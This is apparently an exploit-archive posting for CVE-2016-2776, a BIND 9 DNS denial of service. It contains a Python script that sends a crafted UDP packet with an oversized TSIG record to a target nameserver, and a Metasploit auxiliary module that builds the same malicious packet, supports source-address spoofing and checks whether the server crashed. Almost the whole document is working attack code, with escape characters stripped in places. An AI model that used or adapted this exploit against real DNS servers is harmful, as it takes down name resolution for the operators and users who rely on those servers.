BIND 9 DNS Server Denial Of Service
Posted on 05 October 2016
import socket import struct TARGET = ('192.168.200.10', 53) Q_A = 1 Q_TSIG = 250 DNS_MESSAGE_HEADERLEN = 12 def build_bind_nuke(question="x06googlex03comx00", udpsize=512): query_A = "x8fx65x00x00x00x01x00x00x00x00x00x01" + question + int16(Q_A) + "x00x01" sweet_spot = udpsize - DNS_MESSAGE_HEADERLEN + 1 tsig_rr = build_tsig_rr(sweet_spot) return query_A + tsig_rr def int16(n): return struct.pack("!H", n) def build_tsig_rr(bind_demarshalled_size): signature_data = ("x00x00x57xebx80x14x01x2cx00x10xd2x2bx32x13xb0x09" "x46x34x21x39x58x62xf3xd5x9cx8bx8fx65x00x00x00x00") tsig_rr_extra_fields = "x00xffx00x00x00x00" necessary_bytes = len(signature_data) + len(tsig_rr_extra_fields) necessary_bytes += 2 + 2 # length fields # from sizeof(TSIG RR) bytes conforming the TSIG RR # bind9 uses sizeof(TSIG RR) - 16 to build its own sign_name, algo_name = generate_padding(bind_demarshalled_size - necessary_bytes + 16) tsig_hdr = sign_name + int16(Q_TSIG) + tsig_rr_extra_fields tsig_data = algo_name + signature_data return tsig_hdr + int16(len(tsig_data)) + tsig_data def generate_padding(n): max_per_bucket = [0x3f, 0x3f, 0x3f, 0x3d, 0x3f, 0x3f, 0x3f, 0x3d] buckets = [1] * len(max_per_bucket) min_size = len(buckets) * 2 + 2 # 2 bytes for every bucket plus each null byte max_size = sum(max_per_bucket) + len(buckets) + 2 if not(min_size <= n <= max_size): raise RuntimeException("unsupported amount of bytes") curr_idx, n = 0, n - min_size while n > 0: next_n = max(n - (max_per_bucket[curr_idx] - 1), 0) buckets[curr_idx] = 1 + n - next_n n, curr_idx = next_n, curr_idx + 1 n_padding = lambda amount: chr(amount) + "A" * amount stringify = lambda sizes: "".join(map(n_padding, sizes)) + "x00" return stringify(buckets[:4]), stringify(buckets[4:]) if __name__ == "__main__": bombita = build_bind_nuke() s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.sendto(bombita, TARGET) s.close() ''' ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'timeout' require 'socket' class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::UDPScanner include Msf::Auxiliary::Dos include Msf::Auxiliary::Report def initialize(info={}) super(update_info(info, 'Name' => 'BIND 9 DoS CVE-2016-2776', 'Description' => %q{ Denial of Service Bind 9 DNS Server CVE-2016-2776. Critical error condition which can occur when a nameserver is constructing a response. A defect in the rendering of messages into packets can cause named to exit with an assertion failure in buffer.c while constructing a response to a query that meets certain criteria. This assertion can be triggered even if the apparent source address isnt allowed to make queries. }, # Research and Original PoC - msf module author 'Author' => [ 'Martin Rocha', 'Ezequiel Tavella', 'Alejandro Parodi', 'Infobyte Research Team'], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2016-2776' ], [ 'URL', 'http://blog.infobytesec.com/2016/10/a-tale-of-dns-packet-cve-2016-2776.html' ] ], 'DisclosureDate' => 'Sep 27 2016', 'DefaultOptions' => {'ScannerRecvWindow' => 0} )) register_options([ Opt::RPORT(53), OptAddress.new('SRC_ADDR', [false, 'Source address to spoof']) ]) deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT') end def check_server_status(ip, rport) res = "" sudp = UDPSocket.new sudp.send(valid_query, 0, ip, rport) begin Timeout.timeout(5) do res = sudp.recv(100) end rescue Timeout::Error end if(res.length==0) print_good("Exploit Success (Maybe, nameserver did not replied)") else print_error("Exploit Failed") end end def scan_host(ip) @flag_success = true print_status("Sending bombita (Specially crafted udp packet) to: "+ip) scanner_send(payload, ip, rport) check_server_status(ip, rport) end def get_domain domain = "x06"+Rex::Text.rand_text_alphanumeric(6) org = "x03"+Rex::Text.rand_text_alphanumeric(3) get_domain = domain+org end def payload query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65 query += "x00x00" # Flags: 0x0000 Standard query query += "x00x01" # Questions: 1 query += "x00x00" # Answer RRs: 0 query += "x00x00" # Authority RRs: 0 query += "x00x01" # Additional RRs: 1 # Doman Name query += get_domain # Random DNS Name query += "x00" # [End of name] query += "x00x01" # Type: A (Host Address) (1) query += "x00x01" # Class: IN (0x0001) # Aditional records. Name query += ("x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #192 bytes query += "x3d"+Rex::Text.rand_text_alphanumeric(61) query += "x00" query += "x00xfa" # Type: TSIG (Transaction Signature) (250) query += "x00xff" # Class: ANY (0x00ff) query += "x00x00x00x00" # Time to live: 0 query += "x00xfc" # Data length: 252 # Algorithm Name query += ("x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #Random 192 bytes query += "x1A"+Rex::Text.rand_text_alphanumeric(26) #Random 26 bytes query += "x00" # Rest of TSIG query += "x00x00"+Rex::Text.rand_text_alphanumeric(4) # Time Signed: Jan 1, 1970 03:15:07.000000000 ART query += "x01x2c" # Fudge: 300 query += "x00x10" # MAC Size: 16 query += Rex::Text.rand_text_alphanumeric(16) # MAC query += "x8fx65" # Original Id: 36709 query += "x00x00" # Error: No error (0) query += "x00x00" # Other len: 0 end def valid_query query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65 query += "x00x00" # Flags: 0x0000 Standard query query += "x00x01" # Questions: 1 query += "x00x00" # Answer RRs: 0 query += "x00x00" # Authority RRs: 0 query += "x00x00" # Additional RRs: 0 # Doman Name query += get_domain # Random DNS Name query += "x00" # [End of name] query += "x00x01" # Type: A (Host Address) (1) query += "x00x01" # Class: IN (0x0001)s end end
